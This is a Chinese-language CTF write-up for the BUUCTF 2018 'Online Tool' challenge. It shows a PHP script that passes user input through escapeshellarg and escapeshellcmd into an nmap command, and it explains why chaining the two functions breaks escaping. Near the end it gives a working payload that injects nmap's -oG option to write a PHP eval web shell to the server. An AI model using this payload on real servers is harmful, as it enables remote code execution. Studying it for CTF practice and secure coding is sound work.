[BUUCTF 2018]Online Tool解题思路&过程

<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

代码审计题，首先判断http_x_forwarded_for是否存在，如果存在将其赋值给$_SERVER['REMOTE_ADDR']，$_SERVER['HTTP_X_FORWARDED_FOR']可以使用X-Forwarded-For来伪造。

接下来通过GET方法获得参数$host，对$host执行escapeshellarg和escapeshellcmd两个函数后拼接到nmap -T5 -sT -Pn --host-timeout 2 -F后面，切换到$sandbox目录中执行。

nmap命令中 -oG参数可以写入文件,


escapeshellcmd函数将转义单个出现的单引号，escapeshellarg将对所有的单引号都进行转义，后者对下面的特殊字符也将转义：

& # ; ` | * ? ~ < > ^ ( ) [ ] { } $

当上面两个函数连用时将出现问题，这段分析建议查看知道创宇404实验室的文章，十分经典：https://paper.seebug.org/164/

payload:?host=' <?php @eval($_POST["hack"]);?> -oG hack.php '(引号两侧的空格不可少)
reference：
https://www.cnblogs.com/xhds/p/12484510.html
https://paper.seebug.org/164/
https://blog.csdn.net/qq_26406447/article/details/100711933

acquisition：
1.escapeshellarg、escapeshellcmd两个函数连用处理可控数据是存在隐患的。